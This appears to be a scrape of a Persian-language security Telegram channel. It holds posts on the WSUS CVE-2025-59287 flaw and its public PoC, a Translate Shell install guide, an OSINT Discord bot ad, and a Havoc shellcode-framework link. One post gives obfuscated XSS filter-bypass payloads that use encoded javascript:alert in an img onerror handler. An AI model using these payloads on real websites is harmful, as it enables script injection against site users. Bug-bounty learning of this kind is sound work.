❤2👍1
“یادگیری هوش مصنوعی الان مثل خرید بیت کوین توی 2013 میمونه!”
موافقا لایک مخالفا دیسلایک 👍
⭐️ @RadvanSec
موافقا لایک مخالفا دیسلایک 👍
⭐️ @RadvanSec
👍27👎13
مایکروسافت آپدیت خاص (out-of-band) برای وصله کردن یک نقص بحرانی در Windows Server Update Services (WSUS) منتشر کرده است.
شناسهی این آسیبپذیری CVE-2025-59287 است.
اگر سرور ویندوزی نقش WSUS فعال داشته باشه، مهاجم بدون احراز هویت میتونه کدی به صورت Remote اجرا کنه با امتیازات SYSTEM.
مایکروسافت اعلام کرده این نقص امکان wormable شدن (پراکنده شدن خودکار در شبکهی سرورهای WSUS) رو داره.
لیست نسخههای ویندوز سرور آسیبپذیر و آپدیتها به ترتیب: Windows Server 2025، 23H2، 2022، 2019، 2016، 2012 R2 و 2012.
⭐️ @RadvanSec
شناسهی این آسیبپذیری CVE-2025-59287 است.
اگر سرور ویندوزی نقش WSUS فعال داشته باشه، مهاجم بدون احراز هویت میتونه کدی به صورت Remote اجرا کنه با امتیازات SYSTEM.
مایکروسافت اعلام کرده این نقص امکان wormable شدن (پراکنده شدن خودکار در شبکهی سرورهای WSUS) رو داره.
لیست نسخههای ویندوز سرور آسیبپذیر و آپدیتها به ترتیب: Windows Server 2025، 23H2، 2022، 2019، 2016، 2012 R2 و 2012.
⭐️ @RadvanSec
❤2👌1
🛑 انتشار PoC Exploit برای آسیبپذیری حیاتی در WSUS
◀️یک PoC Exploit برای آسیبپذیری بحرانی در سرویس WSUS مایکروسافت منتشر شده است که به مهاجم بدون احراز هویت اجازه میدهد کد دلخواه را با سطح دسترسی SYSTEM روی سرورهای آسیبپذیر اجرا کند.
◀️این آسیبپذیری با شناسه CVE-2025-59287 و امتیاز CVSS 9.8 شناسایی شده و ناشی از ضعف در فرآیند deserialization دادههای غیرقابل اعتماد در بخش AuthorizationCookie است.
◀️مایکروسافت این نقص را در Patch Tuesday اکتبر 2025 اصلاح کرده است. بهرهبرداری موفق میتواند زیرساخت بهروزرسانی سازمانی را کاملاً در معرض خطر قرار دهد و منجر به تسلط کامل مهاجم بر سرور WSUS شود.
https://gist.github.com/hawktrace/880b54fb9c07ddb028baaae401bd3951
⭐️ @RadvanSec
◀️یک PoC Exploit برای آسیبپذیری بحرانی در سرویس WSUS مایکروسافت منتشر شده است که به مهاجم بدون احراز هویت اجازه میدهد کد دلخواه را با سطح دسترسی SYSTEM روی سرورهای آسیبپذیر اجرا کند.
◀️این آسیبپذیری با شناسه CVE-2025-59287 و امتیاز CVSS 9.8 شناسایی شده و ناشی از ضعف در فرآیند deserialization دادههای غیرقابل اعتماد در بخش AuthorizationCookie است.
◀️مایکروسافت این نقص را در Patch Tuesday اکتبر 2025 اصلاح کرده است. بهرهبرداری موفق میتواند زیرساخت بهروزرسانی سازمانی را کاملاً در معرض خطر قرار دهد و منجر به تسلط کامل مهاجم بر سرور WSUS شود.
https://gist.github.com/hawktrace/880b54fb9c07ddb028baaae401bd3951
⭐️ @RadvanSec
Gist
CVE-2025-59287
CVE-2025-59287. GitHub Gist: instantly share code, notes, and snippets.
❤3
اسم پروژه: Translate Shell (فرمان trans).
پشت صحنه: میتونه از چند موتور ترجمه استفاده کنه (Google پیشفرض، همچنین Bing، Yandex، Apertium و ...).
نیاز به اینترنت دارد (مگر زمانی که از دیکشنریهای آفلاین مثل Stardict یا مدل محلی استفاده کنی).
نصب (سریع)
Debian / Ubuntu
Fedora
Arch (AUR)
⭐️ @RadvanSec
پشت صحنه: میتونه از چند موتور ترجمه استفاده کنه (Google پیشفرض، همچنین Bing، Yandex، Apertium و ...).
نیاز به اینترنت دارد (مگر زمانی که از دیکشنریهای آفلاین مثل Stardict یا مدل محلی استفاده کنی).
نصب (سریع)
Debian / Ubuntu
sudo apt update
sudo apt install translate-shell
# یا اگر در repo نیست:
wget git.io/trans
chmod +x trans
sudo mv trans /usr/local/bin/
Fedora
sudo dnf install translate-shell
Arch (AUR)
paru -S translate-shell # یا yaourt/pacman-AUR مورد علاقهات
از سورس / دستی
https://github.com/soimort/translate-shell
⭐️ @RadvanSec
❤2
از جابهجا شدن بین تبها برای OSINT (اطلاعات متنباز — Open Source Intelligence) و Recon (شناسایی و بازشناسی) خستهاید؟ فقط به Discord ما بپیوندید و تایپ کنید
✅ IP & Domain Lookup (جستوجوی آدرس IP و دامنه)
✅ Email & Phone OSINT (جمعآوری اطلاعات ایمیل و شماره تلفن — OSINT)
✅ Subdomain Enumeration (پیمایش زیردامنهها)
✅ Reverse Image Search (جستوجوی معکوس تصویر)
✅ URL & Virus Scanners (اسکنر آدرسها و بدافزار)
✅ Temp Email (ایمیل موقت)، QR Tools (ابزارهای کد QR)، و موارد دیگر
🌟 میتوانید در یک دقیقه CTF بسازید و بازی کنید — درست داخل Discord!
همین حالا امتحان کنید — سریع، ساده و همهچیز در یک چت.
🔗 [https://discord.gg/u7uMFV833h](https://discord.gg/u7uMFV833h)
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
⭐️ @RadvanSec
sudo help (فرماننما برای اجرا با دسترسی ادمین در لینوکس/یونیکس) تا ابزارهای قدرتمند در عرض چند ثانیه باز شود!✅ IP & Domain Lookup (جستوجوی آدرس IP و دامنه)
✅ Email & Phone OSINT (جمعآوری اطلاعات ایمیل و شماره تلفن — OSINT)
✅ Subdomain Enumeration (پیمایش زیردامنهها)
✅ Reverse Image Search (جستوجوی معکوس تصویر)
✅ URL & Virus Scanners (اسکنر آدرسها و بدافزار)
✅ Temp Email (ایمیل موقت)، QR Tools (ابزارهای کد QR)، و موارد دیگر
🌟 میتوانید در یک دقیقه CTF بسازید و بازی کنید — درست داخل Discord!
همین حالا امتحان کنید — سریع، ساده و همهچیز در یک چت.
🔗 [https://discord.gg/u7uMFV833h](https://discord.gg/u7uMFV833h)
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
⭐️ @RadvanSec
❤3
XSS Bypass
Payloads:
Payloads:
<img+src%3Dx+onerror%3D"%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">
--'<00 foo="<a%20href="javanoscript:prompt(404)">XSS-Click</00>--%20//
❤2👌1
برای generate کردن شل کد میتونید از ابزار Havoc استفاده کنید
https://github.com/HavocFramework/Havoc.git
⭐️ @RadvanSec
https://github.com/HavocFramework/Havoc.git
⭐️ @RadvanSec
GitHub
GitHub - HavocFramework/Havoc: The Havoc Framework
The Havoc Framework. Contribute to HavocFramework/Havoc development by creating an account on GitHub.
❤3⚡1👍1
RadvanSec
BugBounty Program Google Dorks (part2): inurl:/security ext:txt "contact" "powered by synack" intext:responsible disclosure bounty inurl: private bugbountyprogram inurl:/.well-known/security ext:txt inurl:/.well-known/security ext:txt intext:hackerone inurl:/.well…
https://news.1rj.ru/str/bbprograms
علاوه بر دورک هایی که در پیام ریپلی شده موجوده، میتونین برای پیدا کردن تارگت های خارج پلتفرم باگ بانتی، از این چنل استفاده کنین
⭐️ @RadvanSec
علاوه بر دورک هایی که در پیام ریپلی شده موجوده، میتونین برای پیدا کردن تارگت های خارج پلتفرم باگ بانتی، از این چنل استفاده کنین
⭐️ @RadvanSec
❤7